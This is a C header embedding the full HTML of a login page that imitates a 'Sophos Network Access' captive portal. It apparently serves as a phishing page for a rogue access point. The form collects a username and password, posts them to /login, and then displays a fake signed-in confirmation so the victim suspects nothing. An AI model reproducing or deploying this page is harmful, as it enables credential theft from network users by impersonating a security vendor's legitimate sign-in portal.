#pragma once

const char login_page_html[] =
"<!DOCTYPE html>"
"<html lang='en'>"
"<head>"
"    <meta charset='UTF-8'>"
"    <meta name='viewport' content='width=device-width, initial-scale=1.0'>"
"    <title>Sophos Network Access</title>"
"    <style>"
"        * { margin:0; padding:0; box-sizing:border-box; }"
"        body { font-family:Arial, sans-serif; background:#f5f5f5; display:flex; justify-content:center; align-items:center; min-height:100vh; }"
"        .container { background:white; width:340px; box-shadow:0 2px 10px rgba(0,0,0,0.1); }"
"        .header { background:linear-gradient(135deg,#164a8a 0%,#1e5db8 100%); padding:20px; text-align:center; }"
"        .logo { color:white; font-size:28px; font-weight:900; letter-spacing:2px; }"
"        .content { padding:30px 35px; }"
"        .title { color:#1e5aa8; font-size:18px; text-align:center; margin-bottom:25px; }"
"        input[type='text'],input[type='password'] { width:100%; padding:12px 15px; border:1px solid #e0e0e0; font-size:14px; margin-bottom:15px; }"
"        .sign-btn { width:100%; padding:14px; background:#4a9d4a; color:white; border:none; font-size:16px; cursor:pointer; margin-top:10px; }"
"        .portal-link { text-align:center; margin-top:20px; }"
"        .portal-link a { color:#5bc0de; text-decoration:none; font-size:14px; }"
"        .signed-in-text { color:#1e5aa8; font-size:16px; margin-bottom:10px; }"
"        .username-display { color:#1e5aa8; font-size:18px; font-weight:500; margin-bottom:10px; }"
"    </style>"
"</head>"
"<body>"
"<div class='container'>"
"    <div class='header'><div class='logo'>SOPHOS</div></div>"
"    <div class='content'>"

"        <div id='loginForm'>"
"            <form method='POST' action='/login'>"
"                <div class='title'>Sign in to access this network</div>"
"                <input type='text' name='u' placeholder='Username'>"
"                <input type='password' name='p' placeholder='Password'>"
"                <button class='sign-btn' type='submit'>Sign in</button>"
"                <div class='portal-link'><a href='#'>Access the User Portal</a></div>"
"            </form>"
"        </div>"

"        <div id='successScreen' style='display:none; text-align:center;'>"
"            <div class='signed-in-text'>You are signed in as</div>"
"            <div class='username-display' id='displayUsername'></div>"
"            <div class='success-icon' style='"
"                width:70px;height:70px;background:#4a9d4a;border-radius:50%;"
"                display:flex;align-items:center;justify-content:center;"
"                margin:25px auto;font-size:45px;color:white;'>✓</div>"
"            <button class='sign-btn' onclick='window.location=\"/login\"'>Sign out</button>"
"            <div class='portal-link'><a href='#'>Access the User Portal</a></div>"
"        </div>"

"    </div>"   // <-- closes .content
"</div>"       // <-- closes .container

"<script>"
"document.addEventListener('DOMContentLoaded', () => {"
"    const params = new URLSearchParams(window.location.search);"
"    const user = params.get('user');"
"    if (user) {"
"        document.getElementById('displayUsername').textContent = user;"
"        document.getElementById('loginForm').style.display = 'none';"
"        document.getElementById('successScreen').style.display = 'block';"
"    }"
"});"
"</script>"

"</body>"
"</html>";
